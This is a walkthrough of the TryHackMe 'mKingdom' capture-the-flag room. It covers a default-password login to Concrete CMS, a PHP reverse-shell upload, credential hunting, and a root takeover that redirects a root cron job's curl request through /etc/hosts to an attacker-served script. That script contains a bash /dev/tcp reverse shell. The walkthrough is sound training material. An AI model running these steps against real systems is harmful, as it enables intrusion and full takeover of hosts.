# mKingdom {% embed url="" %} Room Link {% endembed %} This work by Manav G Krishna is licensed under [CC BY-NC 4.0](http://creativecommons.org/licenses/by-nc/4.0/?ref=chooser-v1)

**`Machine IP`**: 10.10.54.202 **`Hosts file entry`**: echo '10.10.54.202 mkingdom.thm' | sudo tee -a /etc/hosts **`Nmap Scan`**: ```bash nmap -p- -A -v --min-rate 100 -oN mkingdom_thm -Pn mkingdom.thm Nmap scan report for mkingdom.thm (10.10.54.202) Host is up (0.16s latency). Not shown: 65534 closed tcp ports (reset) PORT STATE SERVICE VERSION 85/tcp open http Apache httpd 2.4.7 ((Ubuntu)) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-title: 0H N0! PWN3D 4G4IN |_http-server-header: Apache/2.4.7 (Ubuntu) No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.94SVN%E=4%D=6/17%OT=85%CT=1%CU=36511%PV=Y%DS=2%DC=T%G=Y%TM=6670 OS:4B91%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10C%TI=Z%CI=I%TS=8)SEQ(S OS:P=106%GCD=1%ISR=10D%TI=Z%CI=I%TS=8)SEQ(SP=106%GCD=2%ISR=10E%TI=Z%CI=I%II OS:=I%TS=8)OPS(O1=M508ST11NW7%O2=M508ST11NW7%O3=M508NNT11NW7%O4=M508ST11NW7 OS:%O5=M508ST11NW7%O6=M508ST11)WIN(W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF% OS:W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S OS:=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%R OS:D=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W= OS:0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U OS:1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DF OS:I=N%T=40%CD=S) Uptime guess: 0.010 days (since Mon Jun 17 19:59:48 2024) Network Distance: 2 hops TCP Sequence Prediction: Difficulty=262 (Good luck!) IP ID Sequence Generation: All zeros TRACEROUTE (using port 443/tcp) HOP RTT ADDRESS 1 165.85 ms 10.11.0.1 2 166.23 ms mkingdom.thm (10.10.54.202) ``` The scan results shows that we have only one open port, that is port **`85`**, running an **`Apache web server`**. **`Checking out port 85`**:

There was nothing interesting in the **`source code`** of the page. We can download the **`image`** on this page and can **`extract`** the **`metadata`** from it using **`exiftool`** , to see if we get any good information:

**`Commands`**: ```bash wget http://mkingdom.thm:85/img1.jpg ``` ```bash exiftool img1.jpg ```

The **`Creator`** field set to **`b0w53r`** shows that the image was created by **`b0w53r`**. Now we can do some **`directory busting`**: **`Command`**: ```bash dirsearch -u http://mkingdom.thm:85/ ```

There is a path named **`/app`**. We can check this out:

The **`source code`** says that, upon clicking on **`JUMP`** we will be redirected to a **`castle`** page:

**`Doing the same`**:

We are now at **`/app/castle`** page. **`Exploring the page`**: We can see what **`Wappalyzer`** tells us:

The **`CMS`** (**`Content management system`**) being used is **`Concrete CMS`** - **`8.5.2`**. The same information can be fetched by using a **`tool`** called **`cmseek`** and also by checking out the **`source code`** of the page: **`Command`**: ```bash cmseek -u http://mkingdom.thm:85/app/castle/ ```

Towards the **`bottom`** of the page we find this:

A **`Log In`** option. There was nothing of interest in the page's **`source code`** other than the **`CMS version`**.

Since we know the **`CMS`** being used, we can try to find if there any **`default`** credentials:

The **`default`** username is **`admin`**, but there is **`no default`** password. Now we can try out a few possible **`default passwords`** such as **`admin`**, **`password`**, **`password123`** etc. The correct **`password`** turned out to be **`password`** itself. **`Logging in`**:

We are now logged in as **`admin`**. The **`name`** that we got previously from the **`image`** on the root of the website, not sure what that was for. Now we can try to find some **`exploits`** for the version **`8.5.2`** of **`Concrete CMS`**. **`Finding exploits`**:

{% embed url="" %} **`Exploitation steps`**:

**`Following the same`**: 1. **`Visiting Allowed File Types`**:

2. **`Adding php extension and Saving`**:

3. **`Visiting File Manager`**:

4. **`Fetching a PHP payload and Uploading`**: In the **`POC`**, an **`msfvenom`** payload is what is being used. Instead we can use the **`PHP PentestMonkey`** one from **`revshells.com`**: {% embed url="" %}

Have saved it as **`shell.php`**:

Click on **`Close`**. The moment we close it we get this **`window`** saying - **`Upload Complete`**:

Setting up a listener on port **`4444`**:

Now upon clicking on the **`URL to File`** / **`Tracked URL`** link the **`PHP`** shell must get **`triggered`** and we should be getting a **`connection`** on our listener. We indeed have got the **`shell`** as **`www-data`**:

**`Stabilizing the shell`**:

**`Enumeration`**: We have **`two`** users other than root having a **`console`**, that is **`toad`** and **`mario`**:

Checking for **`binaries`** that have the **`SUID`** bit set: **`Command`**: ```bash find / -perm -u=s -type f 2>/dev/null ```

The **`cat`** binary has the **`SUID`** bit set:

This means the **`cat`** command will only run as the **`owner`** as far as the **`SUID bit`** is set, in this case, **`toad`**. So a direct **`root flag`** fetching is **`not`** possible as even after becoming **`toad`**, **`toad`** simply can't **`traverse`** inside **`/root`** directory even if the **`root`** flag had **`read permissions`** for **`others`** (**`toad`** in this case) due to fully **`restrictive default permissions`** of the **`/root`** directory (**`drwx------`**). This also applies even if **`cat`** **`didn't`** have the **`SUID`** bit set. The same **`permission restriction`** is there by **`default`** on the **`/home/[user]`** directories too. All other users who are neither the **`owner`** nor **`members`** of the **`group`** for the file falls under **`others`**. The **`root flag`** could have been fetched if the **`owner`** of **`cat`** was set to **`root`** along with the **`SUID bit`** set. **`Removing`** the **`SUID bit`** eases **`restrictions`** as once the **`bit`** is removed, **`cat`** command when run, runs as the user **`running the command`** itself. So if we are using **`cat`** after becoming **`mario`**, **`cat`** command runs as **`mario`**, if we are using **`cat`** after becoming **`root`**, **`cat`** command runs as **`root`**. The **`owner`** of the **`binary`** **`doesn't`** have any effect at all. **`Checking out common directories`**: This leads us to a **`database.php`** file within the directory - **`/var/www/html/app/castle/application/config`**:

The file had **`MySQL`** credentials. The **`username`** being **`toad`**. The first thing that comes to our mind is that we could try to **`get in as toad`** using the found **`password`**. But before this, let us see if we have **`MySQL`** running and if we could possibly **`connect`** to the **`database`** that might contain some information about the other user, **`mario`**. **`Checking out active network connections`**: **`Command`**: ```bash ss -tulpen ```

And we indeed notice port **`3306`** running & listening for connections on the machine's **`localhost`**. **`Connecting to the database`**: **`Command`**: ```bash mysql -u toad -p //The password will be prompted for ```

The only thing that we find is the **`admin's hashed password`** (**`password`**), the **`Concrete CMS`** **`login password`** that we had used initially. We can confirm it is the **`same`** post **`cracking`** it:

Nothing of interest in the **`database`**. Now we try to get in as **`toad`** using **`su`**:

As expected we are the user **`toad`**. Now we can **`remove`** the **`SUID`** bit being set on **`cat`**: **`Command`**: ```bash chmod u-s /bin/cat ```

Now the **`s`** is replaced with **`w`**. The **`SUID bit`** has been removed. We don't have the **`user flag`** in **`toad's`** **`home`** directory. Let us now do some more **`enumeration`**. **`Enumeration`**: We can't run **`sudo`**:

The **`.bashrc`** files gives us a **`base64`** encoded **`password token`**:

The **`same`** can be found out by fetching the **`environment variables`** too:

**`Decoding the PWD_TOKEN`**: **`Command`**: ```bash echo -n aWthVGVOVEFOdEVTCg== | base64 -d ```

We get the **`password`**. This might be **`mario's password`**. We can try to **`get in`** as **`mario`** using **`su`**:

We are now the user **`mario`**. **`Enumeration`**: We have the user flag in **`mario's`** **`home`** directory:

Firstly we are able to use **`cat`** as we had **`removed`** the **`SUID bit`** when we were **`toad`**. So as mentioned before now **`cat`** when used **`runs as mario`** itself. Secondly the **`user flag's`** file **`owner`** and **`group`** is **`root`** and due to this **`mario`** falls under **`others`**. The main reason why we are able to still **`read`** the **`flag`** is because, **`others`** have **`read permissions`** on the **`file`** (**`r--`**). If we **`hadn't removed`** the **`SUID bit`** before, upon trying to **`cat`** the **`user flag`** we would be getting this:

This is because even though **`toad`** too falls under **`others`** itself in the context of the **`user flag`** and since **`others`** can read it even with the **`SUID bit`** set, it just **`doesn't work`** due to the **`permissions`** (**`drwx------`**) on **`mario's`** **`home`** directory (**`/home/mario`**). So **`toad`** **`can't`** even **`traverse`** it in the first place to fetch the **`user flag`**. But we can still **`read`** the **`flag`** using other **`utilities`** as only **`cat`** is what **`can't`** be used (**`without removing the bit`**):

**`Privilege Escalation`**: Checking for **`sudo`** **`rights`**/**`privs`**:

The **`id`** command can be run with **`sudo`** rights:

But this obviously seems to be something kept to derail us, a **`rabbit hole`**. There are **`no`** methods available to make use of **`id`** to **`privilege escalate`**. We also have **`pwfeedback`** option enabled in the **`sudoers`** entry. **`pwfeedback`** is a display feature to show an **`asterisk`** when an user writes a character of its **`password`**.

To confirm if it is **`enabled`** we can see if **`asterisks`** are coming up when we enter **`mario's`** **`password`**:

We indeed see it. This leads us to, **`CVE-2019-18634`**. **`CVE-2019-18634`**: It is a **`sudo`** **`LPE vulnerability`** that needs **`pwfeedback`** to be **`enabled`** for it to work. It is a **`BOF`** exploit.

But the **`sudo`** version must be lesser than **`1.8.26`** for it to work. Checking out the **`sudo`** version:

The version running on the machine is **`1.8.9p5`**. So the exploit **`won't`** work. Now let us see if we have any **`cron jobs`** running. For this **`pspy`** can be used: {% embed url="" %} The machine is **`64-bit`**:

So we have to use **`64-bit`** compatible **`pspy`**:

Sending it to the **`target machine`** post setting up a **`python server`**:

**`Command`**: ```bash wget http://10.11.75.84:4545/pspy64 //The IP here is the tun0 interface IP ```

**`Running it`**:

This **`cron job`** running as **`root`** (**`UID=0`**) stands out to us: ```bash curl mkingdom.thm:85/app/castle/application/counter.sh ``` A **`curl`** request is being sent to **`mkingdom.thm`** on port **`85`** to **`access`** and **`execute`** a **`counter.sh`** script located at **`/app/castle/application/`**. **`Checking out the scripts permissions`**:

Only **`root`** has **`write access`** to it, we as the user **`mario`** has only **`read permissions`**. So **`editing`** this file to place a **`reverse shell`** is now out of the picture. But the **`curl`** request is being sent to the host **`mkingdom.thm`**. So let us check out the **`/etc/hosts`** file as this is used to map **`hostnames`** to **`IP addresses`**.

Here we are able to **`cat`** the **`hosts`** file out as the **`file`** has **`read permissions`** for **`others`** and mainly because the **`/etc`** directory has **`execute permissions`** for **`others`**. So it **`doesn't`** matter even if the **`SUID bit`** is set on **`cat`** with **`toad`** being the **`owner`** as when we run: **`cat /etc/hosts`** it will still run as **`toad`** and **`toad`** falls into **`others`** and due to the **`execute permission`** on **`/etc`**, **`toad`** **`will be able`** to **`traverse`** this directory.

The **`hosts`** file's **`group`** is **`mario`** and we as **`mario`** have **`write permissions`** on the file. **`Thought process`**: Based on the **`cron job`** command, what we could do is **`edit`** the **`hosts file entry`** to point **`mkingdom.thm`** to our **`IP`** (**`tun0`**) and we could place a **`counter.sh`** file containing the **`reverse shell`** within **`app/castle/application/`**, post **`creating`** this exact **`directory structure`** on our **`attacker machine`**. We would also have to set up a **`python server`** on port **`85`**. When the **`cron job`** runs, the **`curl`** request hits our **`IP`** and the **`/app/castle/application/counter.sh`** will be **`served`** via port **`85`** and we would get a **`root shell`** on the listener that we set up. **`Editing the file`**:

**`Creating the directory`**: **`Command`**: ```bash mkdir -p app/castle/application/ ```

The **`counter.sh`** file **`contents`**: ```bash bash -c "bash -i >& /dev/tcp/10.11.75.84/445 0>&1" ```

Setting up the **`python server`**:

Setting up a listener on port **`445`**:

Now we just wait for the **`cron job`** to **`run`**. After a few seconds we can see that the **`counter.sh`** file got **`served`** from **`our machine`**:

Now let us **`check`** out the listener:

We indeed have got a **`connection`** as **`root`**. The **`root flag`** can be **`cat`** ed out as we had **`removed`** the **`SUID bit`** from it when we were **`toad`** itself:

Now if the **`bit`** was still set, we would get this:

So we can use the methods that we did before to **`read`** the **`flag`** (**`more, less, head, tail`**). Default **`/root`** directory **`permissions`**:

Only **`read`**, **`write`** & **`execute`** for the **`owner`**, that is **`root`**. We can also change the **`/root`** directories **`permissions`**, so that **`cat`** with the **`bit`** set which is running as **`toad`** can **`traverse`** (**`execute permission`**) the **`/root`** directory when **`cat /root/root.txt`** is run and **`will be`** able to **`read`** the **`flag`** as it has **`read permissions`** (**`r--`**) for **`others`**, under which **`toad`** falls: **`Command`**: ```bash chmod 755 /root ```

Room solved!! {% embed url="" %} Profile Link {% endembed %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://manav-g-krishna.gitbook.io/tryhackme-writeups/mkingdom.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.